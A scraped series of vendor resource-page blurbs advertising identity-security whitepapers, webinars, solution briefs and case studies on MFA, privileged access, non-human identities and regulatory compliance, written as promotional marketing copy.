- Modified: 2025-07-01 - URL: https://www.silverfort.com/resources/silverfort-cortex-xdr/ Unified endpoint + identity defense to stop modern attacks Endpoints and identities are often exploited together, but they’re still too often defended separately. This solution brief shows how Silverfort and Cortex XDR change that. By integrating identity telemetry from Silverfort with Cortex XDR’s behavioral analytics, your SOC can detect and investigate identity-driven threats like brute force, Pass-the-Hash, and Kerberos abuse—before they escalate. With real-time alerts and enforcement actions like MFA and access blocking, this integration gives you end-to-end visibility and control across your hybrid environment. In this PDF, you’ll learn how to: Prevent lateral movement and ransomware propagation with identity-aware incident detection. Enrich investigations with cross-layer context that connects user authentication with endpoint behavior. Accelerate response without disruption using automatic enforcement policies. Download the PDF and see how Silverfort and Cortex XDR give you a powerful edge in stopping identity-based attacks—fast. --- - Published: 2025-06-23 - Modified: 2025-06-23 - URL: https://www.silverfort.com/resources/comply-with-zero-trust-maturity-model-ztmm-requirements-with-silverfort/ Developed by the CISA to guide U. S. federal agencies and adopted widely across critical industries like finance, energy, and healthcare, ZTMM offers a practical roadmap for implementing Zero Trust Architecture (ZTA) principles. Silverfort’s latest whitepaper, Comply with Zero Trust Maturity Model (ZTMM) Requirements with Silverfort, shows how organizations can meet ZTMM’s identity security requirements and achieve real, measurable progress along its maturity curve. Learn how to protect all users, devices, and services—no matter where they live—by extending modern security controls across your entire hybrid environment. In this whitepaper, you’ll discover how to: Strengthen identity as the foundation of zero trust: Enforce MFA, risk-based access, and continuous verification across every resource—even those legacy systems and command-line tools that traditional IAM can't reach. Advance along ZTMM stages with confidence: Progress from manual controls to adaptive, automated security with seamless deployment and unified access governance. Detect and block identity threats in real time: Stop lateral movement, credential misuse, and privilege escalation with continuous monitoring and automated threat response. Whether you're just beginning your Zero Trust initiative or optimizing your current program, this whitepaper offers clear guidance and actionable insights—powered by Silverfort. --- - Published: 2025-06-23 - Modified: 2025-06-23 - URL: https://www.silverfort.com/resources/solving-key-identity-security-challenges-in-smbs-with-silverfort/ Big identity challenges, SMB-ready solutions Today’s small and medium-sized businesses (SMBs) face enterprise-level cyber threats—with a fraction of the resources. From ransomware to credential-based attacks, identity is now the frontline. But most SMBs have key blind spots in their identity security. MFA often stops at the cloud, non-human identities go unmonitored, and overburdened IT teams are left stitching together manual security controls. That’s where Silverfort comes in. This solution brief explores how a modern, identity-first security approach can eliminate these blind spots—without adding operational overhead. We'll lay out the core identity vulnerabilities SMBs face, and how Silverfort helps close those gaps quickly, simply, and securely. In this brief, you’ll learn how to: Enforce MFA everywhere—not just in the cloud—with extended protection for RDP, legacy apps, file shares, and command-line access. Discover and secure non-human identities (NHIs) like service accounts and scripts, which often fly under the radar and pose huge risks. Simplify compliance and cyber insurance readiness with automated, policy-driven access controls and fast deployment—certified by Microsoft. --- - Published: 2025-06-20 - Modified: 2025-06-20 - URL: https://www.silverfort.com/resources/silverfort-risk-and-incident-notifications-for-slack/ Stay ahead of identity threats with real-time Slack alerts Security teams can’t afford to miss a beat. With Silverfort’s Risk and Incident Notifications for Slack, your team gets a direct line to critical security insights, delivered right where they collaborate. This guide shows how to connect Silverfort with Slack to receive real-time, context-rich alerts the moment a security event occurs. From changes in entity risk levels to newly detected incidents, your team will always know what’s happening, and how to respond, without switching tools or chasing logs. Set it up in minutes, empower your team for faster incident response, and never let risk notifications slip through the cracks again. In this guide, you’ll learn how to: Integrate Slack and Silverfort to push alerts directly to your security channels based on customized risk levels. Accelerate incident response with immediate access to detailed event data, right inside Slack. Gain full visibility into security threats, helping you prioritize and act on high-risk events faster. Get the PDF to streamline your security workflows with Slack. --- - Published: 2025-06-20 - Modified: 2025-06-20 - URL: https://www.silverfort.com/resources/silverfort-risk-and-incident-notifications-for-microsoft-teams/ Supercharge Microsoft Teams with Silverfort risk alerts Want to turn Microsoft Teams into a security command center? With Silverfort’s Risk and Incident Notifications for Microsoft Teams, now you can. Our solution brief explains how to integrate Silverfort with Teams to receive instant alerts on security events—from risk level changes to critical incident discoveries—right in your chat feed. No more toggling between dashboards or digging through logs. You’ll get context-rich notifications that empower faster, smarter responses to emerging threats. Easy to deploy and highly configurable, this integration turns collaboration into action. In this guide, you’ll learn how to: Connect Microsoft Teams to Silverfort to enable custom, real-time risk and incident notifications. Improve visibility across your environment, so you can prioritize threats with clarity and speed. Streamline security ops with faster incident detection and reduced time-to-response. Get the PDF to elevate your detection and response game with Teams. --- - Published: 2025-06-18 - Modified: 2025-06-18 - URL: https://www.silverfort.com/resources/silverfort-ai-agent-security/ Confidently secure the next wave of AI innovation with Silverfort's AI Agent Security. AI agents are changing the game, bringing automation, reasoning, and decision-making into everyday enterprise workflows. But with real potential comes real risk. These agents often act independently, hold high privileges, and can’t always be traced back to a specific human owner, creating a recipe for unaccountable access, data leakage, and security blind spots. Silverfort AI Agent Security bridges the gap between innovation and protection. This solution brief explores how Silverfort treats AI agents as fully governed identities by making every action attributable, every access justifiable, and every decision secure. With inline enforcement, least-privilege access, and seamless deployment, you can embrace AI without exposing your critical systems. In this solution brief, you’ll learn: How to enforce human accountability for AI agents by linking every action to a real user for transparency and auditability. How to stop AI agent overreach by preventing lateral movement, data misuse, and hidden prompt injection attacks. How to deploy identity-first security with centralized control, inline access policies, and fast, non-intrusive integration. Get the brief today and learn how to unlock AI agent potential securely. Ready to see Silverfort's AI Agent Security in action? Get a demo here. --- - Published: 2025-06-17 - Modified: 2025-08-19 - URL: https://www.silverfort.com/resources/facing-and-overcoming-retail-identity-protection-challenges-2/ In the rapidly evolving threat landscape, retail companies have emerged as prime targets for identity threats, highlighting a concerning trend in the industry’s attack surface. The sheer volume of customer data handled by retail businesses, coupled with the increasing sophistication of cybercriminals, has created a perfect storm for identity-related security breaches. Download this eBook to learn: The different identity protection challenges that retailers face Why traditional MFA and other common solutions are ineffective solutions for defending against identity threats How Silverfort can empower you with end-to-end identity protection across your environments --- - Published: 2025-06-13 - Modified: 2025-06-13 - URL: https://www.silverfort.com/resources/comply-with-the-security-of-critical-infrastructure-soci-act-requirements-with-silverfort/ Australia’s Security of Critical Infrastructure (SOCI) Act has transformed the regulatory landscape for operators of essential services. With expanded coverage across 11 sectors and strict requirements like real-time incident reporting and board-level cyber accountability, the stakes have never been higher. This white paper unpacks how Silverfort enables seamless SOCI compliance through modern identity security. From unifying visibility across legacy, cloud, and hybrid systems to enforcing granular access controls and dynamic risk-based policies, Silverfort empowers organisations to prevent identity-based attacks, pass audits, and avoid costly penalties. In this white paper, you'll learn how to: Automatically fulfil SOCI’s Positive Security Obligations through adaptive identity controls Prevent credential compromise, lateral movement, and unauthorised access across all environments Extend MFA, privileged access security, and continuous monitoring to every identity—including legacy and non-human accounts Whether you're preparing for a board attestation or aiming to meet CIRMP requirements, this is your go-to guide for identity-first compliance. --- - Published: 2025-06-13 - Modified: 2025-06-13 - URL: https://www.silverfort.com/resources/silverfort-authenticator-for-microsoft-teams/ Introducing Silverfort Authenticator for Microsoft Teams, a seamless way to extend secure authentication flows into the collaboration tool your teams use every day. With this integration, organizations can replace or supplement the Silverfort Desktop Application. In addition to Identity Bridge flows, Silverfort Authenticator for Microsoft Teams supports FIDO2 tokens, One-Time Password (OTP) authentication, and Just-in-Time (JIT) access notifications for Privilege Access Security users. These capabilities allow end users to receive and approve access request directly within Microsoft Teams, reducing dependency on the Silverfort Desktop Application while maintaining strong identity security posture across authentication methods. Whether you're supporting hybrid infrastructure, legacy systems, or privileged access workflows, Silverfort’s Teams integration makes secure access frictionless and intuitive. Simplify Silverfort deployment with authentication inside Teams Extend FIDO2, OTP, and JIT access policies for privileged users—without leaving your chat window Eliminate complexity, boost adoption, and secure every identity, right where your users work --- - Published: 2025-06-09 - Modified: 2025-06-09 - URL: https://www.silverfort.com/resources/silverfort-and-onespan-fido2-integration/ Looking to eliminate identity threats across your entire infrastructure — even the resources traditional MFA can’t reach? Silverfort and OneSpan have joined forces to deliver a powerful, seamless integration that enables FIDO2 multi-factor authentication (MFA) across every on-prem and cloud resource, including legacy systems, remote access tools, and critical IT infrastructure. This joint solution combines OneSpan’s FIDO2-certified hardware authenticators with Silverfort’s adaptive authentication and real-time risk analysis, allowing you to strengthen your identity security posture without compromising user experience. Whether it’s securing PowerShell access, protecting file shares, or enforcing consistent authentication across SaaS and RDP, this integration lets you stop identity-based attacks in their tracks, even in places MFA couldn’t reach before. Read this solution brief to learn: How the integration works: See how Silverfort evaluates risk and triggers OneSpan’s FIDO2 MFA only when suspicious activity is detected. Where MFA can now go: Discover how to protect legacy apps, command-line tools, desktop logins, and more — without code changes. Why it matters: Understand the business and security benefits of extending real-time identity protection across your hybrid environment. No MFA fatigue. No resource left behind. Just airtight, context-aware identity protection wherever it’s needed. --- - Published: 2025-06-06 - Modified: 2025-06-06 - URL: https://www.silverfort.com/resources/silverfort-cyberark-joint-solution-brief/ Seamlessly extend CyberArk Identity to on-prem resources At Silverfort, we enable organizations to bring modern identity security to legacy environments. Our CyberArk Identity Bridge integrates legacy authentication protocols—such as Kerberos, NTLM, and LDAPS—into CyberArk Identity, transforming on-prem resources into manageable, policy-driven entities. By acting as a SAML Service Provider (SP), we make it possible to apply CyberArk’s web SSO flows, MFA, and access policies to previously unprotectable assets like legacy apps, command-line tools, and IT infrastructure. With our bridge, every authentication attempt is evaluated and routed through CyberArk Identity, ensuring consistent policy enforcement, real-time protection, and a seamless user experience across hybrid environments. Organizations can gain unified visibility and control, dramatically reducing the risk of identity-based attacks and lateral movement threats. Why it matters: Unify identity security across cloud and on-prem resources with centralized access policies and MFA. Protect the unprotectable, applying CyberArk Identity controls to legacy apps, servers, and infrastructure. Stop advanced threats, including lateral movement and ransomware, with real-time detection and enforcement. Explore how Silverfort brings end-to-end identity security to every corner of your environment. --- - Published: 2025-06-06 - Modified: 2025-06-06 - URL: https://www.silverfort.com/resources/an-identity-security-playbook-the-what-and-the-why/ Every security program needs a floor to stand on and a ceiling to grow into. In identity security, that floor is visibility, control, and the ability to act when something looks off. The ceiling is a strategy that holds up under pressure, even as your environment expands across cloud, hybrid, human, and machine identities. Most teams are stuck somewhere in between. This session lays out a clear playbook to move from scattered tools and reactive policies to a connected, enforceable identity strategy. We will walk through the IDEAL framework step by step, (Integrate, Discover, Enforce, Act & Action, Lightweight), with a focus on how to apply it in real environments without starting from scratch. Key takeaways: What today’s identity attack surface really looks like Why fragmentation makes access control harder than it should be How to secure both human and non-human identities across hybrid environments Where the IDEAL framework helps close gaps and raise your baseline How to get started with wins that build momentum If you are ready to raise the floor of your identity program and start building toward a more resilient ceiling, this webinar is for you. --- - Published: 2025-05-30 - Modified: 2025-05-30 - URL: https://www.silverfort.com/resources/shining-a-light-on-the-hidden-risks-of-non-human-identities/ Non-human identities (NHIs) - like service accounts, API keys, certificates, tokens, automation scripts, and cloud roles - now outnumber human users 50 to 1 in the average enterprise. These machine identities can authenticate, move laterally, and access sensitive systems - yet they often operate without oversight, visibility, or proper controls. In this webinar, identity security experts Nick Cavalancia and Roy Akerman (VP, Identity Security Strategy at Silverfort) expose the growing NHI attack surface and reveal how adversaries are weaponizing unmanaged, overprivileged, and ownerless accounts across hybrid and multi-cloud environments. What you'll learn in this webinar: What qualifies as a non-human identity in modern environments Why NHIs are exploding in number - and how they’re created Real-world breach examples: OAuth token abuse, Dropbox Sign compromise, and more How attackers exploit dormant service accounts and cloud secrets to move laterally Gaps in traditional IAM, PAM, and MFA when it comes to NHIs Key findings from Silverfort’s NHI Spotlight Report (2025) How to establish behavioral baselines and apply adaptive security controls Steps to discover, classify, and govern NHIs across all environments Whether you're an identity architect, SOC analyst, or CISO, this session gives you practical guidance and a clear action plan to regain visibility and control over your fastest-growing identity risk. --- - Published: 2025-05-27 - Modified: 2025-05-27 - URL: https://www.silverfort.com/resources/solving-key-identity-security-challenges-in-state-and-local-government-with-silverfort/ In 2024, 34% of U. S. state and local government organizations reported being hit by ransomware attacks, with the average recovery cost reaching $2. 8m. Without proper security controls, government agencies remain at risk of significant security challenges, especially against identity-based attacks. Download this solution brief to learn: What makes the government sector a key target for identity threats Key steps for solving identity security challenges How the Silverfort Identity Security Platform can help --- - Published: 2025-05-27 - Modified: 2025-06-10 - URL: https://www.silverfort.com/resources/solving-key-identity-security-challenges-in-finance-with-silverfort/ Financial services remains a top target for ransomware and credential-based attacks, with a sharp increase of 61% year-over-year in Q1 2025. Without proper security controls, financial organizations face serious risks from identity-based threats and escalating financial, operational and reputation damage. Download this solution brief to discover: Why the finance sector is a key target for identity threats How to solve identity security challenges affecting your sector How the Silverfort Identity Security Platform can help --- - Published: 2025-05-22 - Modified: 2025-05-22 - URL: https://www.silverfort.com/resources/winning-the-privileged-access-battle-from-firefighting-to-field-control/ Identity security has a privileged access problem. Faced with massive complexity in securing your most important infrastructure, current approaches to controlling privileged access risk put you in firefighting mode & in the slow lane to winning. Rob Ainscough knows this firsthand. As Head of IAM at Tesco, he didn’t just follow the playbook — he had to rewrite it, with attackers circling and auditors closing in. Now, as Silverfort’s Chief Identity Security Advisor, Rob’s stepping back onto the field to show how to build a robust identity floor that holds the line. One that buys you space & time to regroup, improve, and push forward with confidence. Watch this on-demand webinar to learn first-hand: Why privilege controls fail, even with all the “right” tools What didn’t work — and what finally did How to break the cycle and start building forward, with confidence Why the floor is your defensive line — and the ceiling is where real maturity begins Battle-tested tactics, red team lessons, and strategy that works in the real world This isn’t a roadmap. This is a game plan. Rob will show you how to stop chasing compliance and start controlling risk — from the ground up. --- - Published: 2025-05-21 - Modified: 2025-05-21 - URL: https://www.silverfort.com/resources/schutz-sensibler-konten-ohne-umwege-privileged-access-neu-gedacht/ Administratorkonten sind ein Hauptziel für Angreifer. Wird eines kompromittiert, droht unbemerkter Zugriff auf das gesamte Netzwerk – mit gravierenden Folgen. Lange galten klassische Sicherheitsansätze wie Privileged Access Management (PAM) als ausreichend. Doch moderne Angriffstechniken und dynamische Infrastrukturen zeigen: Reaktive Maßnahmen greifen zu kurz. Notwendig ist ein proaktiver, identitätszentrierter Ansatz, der privilegierte Zugriffe in Echtzeit schützt. Silverfort bietet genau das – durchsetzbare Zugriffsrichtlinien ohne Agenten oder Passwort-Tresore, dafür mit maximalem Schutz vor Credential Abuse, lateralen Bewegungen und unsichtbarer Kompromittierung. In diesem Webcast erfahren Sie: Welche Risiken mit privilegierten Admin-Konten verbunden sind Warum klassische PAM-Lösungen in hybriden Infrastrukturen oft an ihre Grenzen stoßen Wie PAM und Silverfort PAS (Privileged Access Security) sich sinnvoll ergänzen Wie Sie mit PAS Tiering-Modelle umsetzen, privilegierte Zugriffe segmentieren und mit Just-in-Time-Zugriffsrichtlinien Missbrauch verhindern Warum privilegierte Identitäten Echtzeitschutz brauchen --- - Published: 2025-05-09 - Modified: 2025-05-09 - URL: https://www.silverfort.com/resources/get-ahead-of-hipaas-new-identity-requirements/ Download the Free HIPAA Identity Compliance Cheat Sheet Cyberattacks targeting healthcare are surging—and outdated HIPAA rules can’t keep up. Proposed updates aim to modernize identity security mandates, but once ratified, enforcement will come fast. This cheat sheet helps you understand what’s changing, why it matters now, and how to prepare. With complex, fragmented compliance requirements across states, healthcare organizations must act early to reduce risk and stay ahead. What You’ll Learn: Key changes to identity security under HIPAA’s proposed updates Where and how MFA will be required for ePHI access Expanded incident response and reporting obligations How to assess risks through better identity security posture management What’s needed for continuous monitoring and enforcement --- - Published: 2025-05-08 - Modified: 2025-06-06 - URL: https://www.silverfort.com/resources/bridging-on-prem-authentication-with-keyless-security/ Explore how Silverfort’s Keyless bridge extends biometric, phishing-resistant MFA across your hybrid infrastructure—from cloud to legacy on-prem systems. This one-pager breaks down how Keyless, Silverfort’s privacy-preserving facial recognition solution, integrates seamlessly into existing environments to unify identity security without disrupting operations. Learn how to enforce modern access policies everywhere, detect lateral movement, and gain full visibility into authentication activity across all resources. Why read this? Protect the unprotectable – Extend Keyless MFA to legacy apps, servers, and command-line tools. Seamless integration – Apply cloud-native access controls across on-prem and SaaS environments. Real-time identity protection – Detect and block lateral movement attacks before they escalate. --- - Published: 2025-05-06 - Modified: 2025-05-06 - URL: https://www.silverfort.com/resources/microsoft-silverfort-webinar-meilleures-pratiques-et-challenges-du-tiering-ad/ Alors que la surface d’attaque des identités continue d’évoluer avec de nouvelles méthodes pour compromettre les organisations, le besoin de sécuriser Active Directory (AD) devient de plus en plus important. Bien que le Tiering AD soit une pratique fondamentale pour séparer et protéger les comptes à privilèges, de nombreuses organisations négligent son importance, ce qui les rend vulnérables aux acteurs malveillants. La mise en œuvre de contrôles de sécurité rigoureux est essentielle pour empêcher les accès non autorisés et les mouvements latéraux. Dans ce webinaire, Microsoft et Silverfort exploreront les éléments essentiels du Tiering AD, ses défis, et échangeront sur les capacités de Silverfort pour aider les organisations à surmonter ces défis en toute simplicité. --- - Published: 2025-05-06 - Modified: 2025-05-06 - URL: https://www.silverfort.com/resources/sichere-identitaten-weniger-risiko-so-stoppen-sie-ransomware-effektiv/ Die Cybersicherheitslandschaft verändert sich rasant, und Identitätssicherheit spielt eine entscheidende Rolle im Schutz vor modernen Bedrohungen. In hybriden Unternehmensumgebungen ist es essenziell, genau zu wissen, wer auf was zugreift, um unbefugten Zugriff zu verhindern und gleichzeitig sichere Berechtigungen zu gewährleisten. Doch in vielen Unternehmen fehlt ein umfassender Überblick über Identitäten und ihre Zugriffsrechte – eine Schwachstelle, die Cyberkriminelle gezielt ausnutzen.    Vor allem Ransomware-Angriffe sind längst keine Ausnahme mehr, sondern stellen eine konstante Gefahr für Unternehmen jeder Größe dar. Besonders problematisch sind laterale Bewegungen, mit denen sich Angreifer unbemerkt im Netzwerk ausbreiten und aus einem einzelnen Vorfall eine unternehmensweite Krise machen.   Doch warum hat die Zahl dieser lateralen Bewegungen in den letzten Jahren massiv zugenommen? Und weshalb scheitern selbst moderne Sicherheitslösungen oft daran, diese Bedrohung wirksam zu stoppen? In diesem Webinar erfahren Sie:   Warum laterale Bewegungen eine der größten Gefahren für Ihre IT sind Wie On-Prem-MFA und der Schutz von Service-Accounts Ransomware eindämmen Warum ein identitätszentrierter Schutz unerlässlich ist Wie Sie mit Silverforts Privileged Access Security (PAS) Least-Privilege- und JIT-Zugriffsrichtlinien durchsetzen --- - Published: 2025-04-30 - Modified: 2025-07-01 - URL: https://www.silverfort.com/resources/cyber-assessment-framework-caf-compliance-with-silverfort/ As identity-based threats rise across critical infrastructure sectors, compliance with the UK’s Cyber Assessment Framework (CAF) is more vital—and complex—than ever. That’s where Silverfort comes in. Our new whitepaper, “CAF Compliance with Silverfort,” provides a deep dive into how your organisation can streamline its path to CAF compliance using the Silverfort Identity Security Platform. From securing privileged accounts to enforcing multi-factor authentication (MFA) across previously unprotectable resources, Silverfort equips your team with the tools to meet and exceed CAF security objectives. This comprehensive guide maps Silverfort’s capabilities directly to CAF’s core principles, including identity and access control, privileged user management, and continuous monitoring. Learn how to automatically discover and classify privileged accounts, enforce Just-in-Time (JIT) access policies, and eliminate standing privileges—without complex deployments or traditional PAM limitations. Whether you're just starting your CAF journey or enhancing existing controls, this whitepaper outlines how Silverfort helps reduce your attack surface, improve incident response, and satisfy compliance requirements with minimal disruption. What you'll learn: How Silverfort aligns with each CAF objective and principle Why traditional PAM leaves critical gaps—and how to close them How to enforce Zero Standing Privileges and detect identity threats in real time Download the whitepaper now and take the first step toward effortless CAF compliance. --- - Published: 2025-04-22 - Modified: 2025-04-22 - URL: https://www.silverfort.com/resources/uncovering-and-addressing-the-blind-spots-in-privileged-access-management/ Many organizations depend on Privileged Access Management (PAM) to secure administrator accounts — but relying on PAM alone can leave dangerous security gaps. Attackers increasingly exploit standing privileges, misconfigured accounts, and overlooked non-human identities. It’s time to evolve your privileged access strategy. In this webinar, Ron Rasin, Chief Strategy Officer at Silverfort, and Kev Smith, Principal Engineer at Silverfort discuss the inherent blind spots in traditional PAM solutions and dive into the fundamentals of Privileged Access Security (PAS), interactively exploring key strategies for discovering, classifying, and securing privileged accounts across various organizational tiers. Topics covered, include: Why PAM solutions fall short in fully securing privileged accounts The hidden risks of standing privilege in both human and non-human identities How to continuously discover and classify privileged accounts across your environment The power of Just-in-Time (JIT) access to eliminate standing privileges How virtual fencing can enforce secure, context-based access controls Ways to strengthen your identity security posture and reduce cyber insurance premiums --- - Published: 2025-04-10 - Modified: 2025-05-07 - URL: https://www.silverfort.com/resources/qualify-for-cyber-insurance-with-fast-and-effective-ad-security/ As cyber insurance requirements tighten, organizations are under pressure to demonstrate robust identity security—particularly within Active Directory (AD) environments. In our latest guide, we outline how businesses can meet and exceed insurer expectations by eliminating identity security blind spots and enforcing MFA across all privileged access points. We'll explore the four key reasons Silverfort is uniquely positioned to accelerate your cyber insurance policy qualification, detailing our partnerships with top insurers and how we help clients reduce premiums and eliminate coverage exclusions. Download the guide to learn how Silverfort can help you: Meet cyber insurance MFA and monitoring requirements with ease Prevent credential-based attacks across your hybrid environment Achieve rapid security improvements with minimal operational impact Secure your AD. Simplify your insurance journey. Strengthen your defenses. --- - Published: 2025-04-02 - Modified: 2025-04-15 - URL: https://www.silverfort.com/resources/case-study-trinity-college-cambridge-strengthens-mfa-and-service-account-protection-with-silverfort/ Trinity College Cambridge faced a critical challenge: securing privileged and service accounts in their on-prem Active Directory. While their cloud-based applications had strong security, legacy infrastructure remained exposed—and their service accounts lacked oversight. “Our privileged accounts and service accounts were a primary area of concern. We lacked visibility into service account behaviours, and our on-prem applications had no MFA support, leaving potential security gaps,” said Duncan Malthouse-Hobbs, Head of IT at Trinity College. Until they met Silverfort. By implementing Silverfort’s adaptive MFA and identity security, Trinity College: Enforced MFA on privileged accounts without disrupting IT operations Gained real-time visibility into service account activity and risks Secured legacy applications and command-line authentication "Rolling out Silverfort was incredibly straightforward. We quickly saw value in its ability to enforce MFA on legacy systems without additional software. ” — Bryan Carpenter, IT Infrastructure Engineer This case study is a must-read for IT and security leaders looking to strengthen identity security across hybrid environments. --- - Published: 2025-04-01 - Modified: 2025-04-01 - URL: https://www.silverfort.com/resources/hipaa-compliance-2-0-is-your-identity-security-strategy-ready/ The newly proposed HIPAA security updates are being reviewed now, and they will demand more than just “check-the-box" compliance. Identity security on the frontline of healthcare cybersecurity and HIPAA compliance. Attackers are actively exploiting weak identity security controls—don’t let your organization be next. The proposed changes to the HIPAA framework are a necessary step toward helping the healthcare industry in its fight against cybercriminals. However, even if the mandate stays the same, your identity security strategy cannot. Hear from our experts for a practical guidance webinar to learn: How attackers exploit weak authentication, excessive privileges, and service account misconfigurations. Proactive identity security strategies to strengthen your compliance posture. Best practices to get ahead of evolving HIPAA requirements and defend against emerging identity threats. Don’t miss this opportunity to ensure your organization is prepared, protected, and compliant. --- - Published: 2025-03-24 - Modified: 2025-03-31 - URL: https://www.silverfort.com/resources/securing-privileged-access-from-blind-spots-to-resilience/ Securing privileged users in Active Directory is more critical than ever—but relying solely on Privileged Access Management (PAM) solutions leaves security and operational gaps. Complex onboarding, maintenance challenges, and hidden blind spots prevent organizations from achieving zero-trust true resilience. This eBook explores a modern, automated approach to securing privileged access, whether replacing, complementing, or enhancing your existing PAM strategy. Download this eBook to learn:  The hidden security gaps and challenges of traditional PAM solutions Five essential pillars of identity security for privileged access protection How Privileged Access Security (PAS) reduces risk and improves resilience  Strategies to integrate PAS with or without an existing PAM solution  How to achieve a triple-layered Zero Trust identity security approach for privileged access with Silverfort. Get the eBook and take the next step in securing your privileged users and service accounts in Active Directory and beyond. --- - Published: 2025-03-13 - Modified: 2025-03-19 - URL: https://www.silverfort.com/resources/francis-odums-securing-the-identity-attack-surface-report/ Learn why leading cybersecurity research and software analyst Francis Odum says that Silverfort is the "furthest along" in delivering a solution that covers the three core tenets of securing the identity attack surface: visibility, identity security posture management (ISPM), and identity threat detection and response (ITDR). The concept of the attack surface is nothing new, but its application to identity is. In this report, learn what it takes to protect the identity attack surface, and why it requires an end-to-end solution that both encompass core functionality, and span protection from the cloud to on-prem. Download this report to learn: The core security gaps in identity, and how to close them The core elements you should look for when seeking an identity security solution, and How Silverfort solves the identity security problem by going beyond traditional detection capabilities to "enforcing security controls at the identity layer" to stop risky authentication attempts. --- - Published: 2025-03-13 - Modified: 2025-03-13 - URL: https://www.silverfort.com/landing-page/on-demand-webinar/unveiling-ntlmv1-vulnerabilities-risks-and-mitigation-strategies-in-active-directory-environments/ Despite Microsoft's announcement of the deprecation of NTLMv1 due to its inherent security weaknesses, recent findings reveal that many organizations continue to be susceptible to NTLMv1-based attacks. A significant discovery by Silverfort's research team highlights a misconfiguration in Active Directory Group Policy, which, despite intentions to disable NTLMv1, inadvertently permits its continued use. In this webinar, we do a comprehensive technical deep dive into the vulnerabilities associated with NTLMv1, emphasizing the implications of the identified Group Policy misconfiguration, and learn how you can mitigate the risks. Gain insight into: NTLMv1 and Its Security Flaws: An overview of NTLMv1, its operational framework, and the inherent vulnerabilities that render it susceptible to exploitation. Active Directory Group Policy Misconfigurations: An in-depth analysis of the recent findings by Silverfort, detailing how certain misconfigurations can unintentionally allow NTLMv1 authentications to persist, undermining organizational security efforts. Exploitation Techniques: Examination of methods employed by attackers to leverage NTLMv1 vulnerabilities for bypassing SMB and LDAP signing, enabling credential theft and unauthorized network access. Mitigation Strategies: Best practices and actionable steps to effectively disable NTLMv1, correctly configure Group Policies, and enhance overall network security to prevent potential breaches. --- - Published: 2025-03-03 - Modified: 2025-03-28 - URL: https://www.silverfort.com/resources/identity-security-posture-management-with-silverfort/ Strengthen Your Identity Security Posture In today's complex hybrid environments, misconfigurations and legacy systems can leave organizations vulnerable to identity-based threats. Silverfort's Identity Security Posture Management (ISPM) solution provides comprehensive visibility into security gaps, enabling proactive detection and remediation of vulnerabilities before they can be exploited. By analyzing real user access activities across both on-prem and cloud infrastructures, Silverfort offers actionable insights to enhance your organization's resilience against identity threats. Download the solution brief to learn: How to identify and address misconfigurations and insecure settings that expose your environment to potential breaches. The benefits of unified analysis across on-prem and cloud environments for a holistic view of your security posture. Strategies for active exposure mitigation using actionable guidance and enforcement of adaptive policies. Take a proactive approach to identity security—download the solution brief now to fortify your organization's defenses. --- - Published: 2025-03-01 - Modified: 2025-03-28 - URL: https://www.silverfort.com/resources/non-human-identity-nhi-security-with-silverfort/ Secure Your Non-Human Identities with Silverfort Non-human identities (NHIs), such as service accounts and automated processes, are integral to modern IT operations but often lack adequate security measures, making them prime targets for attackers. Silverfort's Non-Human Identity Security solution offers comprehensive protection by automatically discovering, monitoring, and securing all NHIs across your hybrid environment without the need for password rotation. This approach ensures seamless integration and robust defense against unauthorized access and lateral movement. Download the solution brief to learn: How to achieve complete visibility over every NHI, including previously unknown accounts, to assess and mitigate potential risks. Strategies for enforcing adaptive access policies that detect and block anomalous behavior in real time, preventing lateral movement attacks. Methods to protect privileged service accounts without disrupting critical processes or requiring complex password rotations. Enhance your organization's security posture by proactively managing and safeguarding non-human identities. Download the solution brief now to get started. --- - Published: 2025-02-27 - Modified: 2025-08-12 - URL: https://www.silverfort.com/resources/the-identity-security-playbook/ Your 5-Step Action Plan to a Sustainable Identity Security Strategy This guide is your essential resource for securing every identity across your organization’s expanding digital landscape. You’ll find practical insights and a 5-Step action plan to achieving a sustainable, effective identity security strategy. Plus, you'll learn: How identity security has evolved with more advanced identity threats, increasing complexity in hybrid enterprise environments, and the explosion of non-human identities to manage. Why the traditional IAM methods fall short including PAM, ITDR, ISPM, MFA and more. What the 5 key requirements are for taking the IDEAL approach to modern identity security are so your organization can get ahead of both attackers and auditors. Whether you’re part of an identity team managing access or a security team mitigating risk, this guide will help you align your strategies, ensuring both attackers and auditors never catch you off guard. --- - Published: 2025-02-19 - Modified: 2025-03-28 - URL: https://www.silverfort.com/resources/identity-threat-detection-response-with-silverfort/ Protect Your Organization from Identity Threats Identity-based attacks are on the rise, targeting credentials, privileges, and access pathways. Silverfort’s Identity Threat Detection and Response (ITDR) solution helps security teams detect, prevent, and respond to these threats in real time. By continuously monitoring authentication and access attempts across all on-prem and cloud environments, Silverfort provides proactive threat defense and seamless integration with SIEM, SOAR, and XDR platforms for faster incident response. Download the solution brief to learn: How Silverfort monitors authentication patterns for unparalleled threat detection across all hybrid environments. Why identity-first security accelerates response to credential theft, privilege escalation, and lateral movement. How Silverfort integrates with your existing security stack to automate identity threat protection. Get the full details—download now and stay ahead of identity-based attacks. --- - Published: 2025-01-23 - Modified: 2025-04-16 - URL: https://www.silverfort.com/resources/beyond-the-perimeter-addressing-blind-spots-in-identity-security-for-2025-and-beyond/ As the security attack landscape continues to evolve, identity security has emerged as the next critical frontier. With an anticipated surge in identity-related threats as we move into 2025, organizations can no longer afford to overlook the security risks tied to user identities, access controls, and digital credentials. In this webinar, Silverfort CEO and Co-Founder, Hed Kovetz, dives deep into the different blind spots in identity security and explores why it’s becoming a top priority for security leaders worldwide. Topics covered include: The market challenges of 2024 that are setting the stage for identity security’s rapid growth in importance. How major players in the identity space are pivoting their strategies, including the role of mergers and acquisitions in shaping the future. Key steps every industry must take now to avoid carrying today’s security gaps into the new year. The alarming rise of deepfakes and adversarial AI, which are fueling sophisticated phishing and credential-based attacks - and how the C-Suite can proactively respond to these threats. And more Whether you’re a security professional, IT leader, or C-Suite executive, this webinar shares invaluable insights into the identity security landscape, so you come away empowered to tackle the challenges and threats of 2025. --- - Published: 2025-01-23 - Modified: 2025-02-27 - URL: https://www.silverfort.com/resources/us-insurance-provider-enhances-identity-security-posture-with-authentication-firewall/ When a trusted insurance provider sought to power up their identity security posture, they came to Silverfort. Led by their CISO's proactive approach to cybersecurity, the company knew they needed: Complete on-prem MFA protection Full visibility into their service accounts Strict security controls for all users, especially privileged accounts. After a successful POC, the company realized the Silverfort platform was the ideal solution for their identity security needs. The deployment took less than one month, during which they enrolled 425 employees, configured 36 service accounts, and set an authentication firewall to deny access unless explicitly allowed. Download this case study to discover how Silverfort strengthened this US insurance provider's identity security posture. --- - Published: 2025-01-15 - 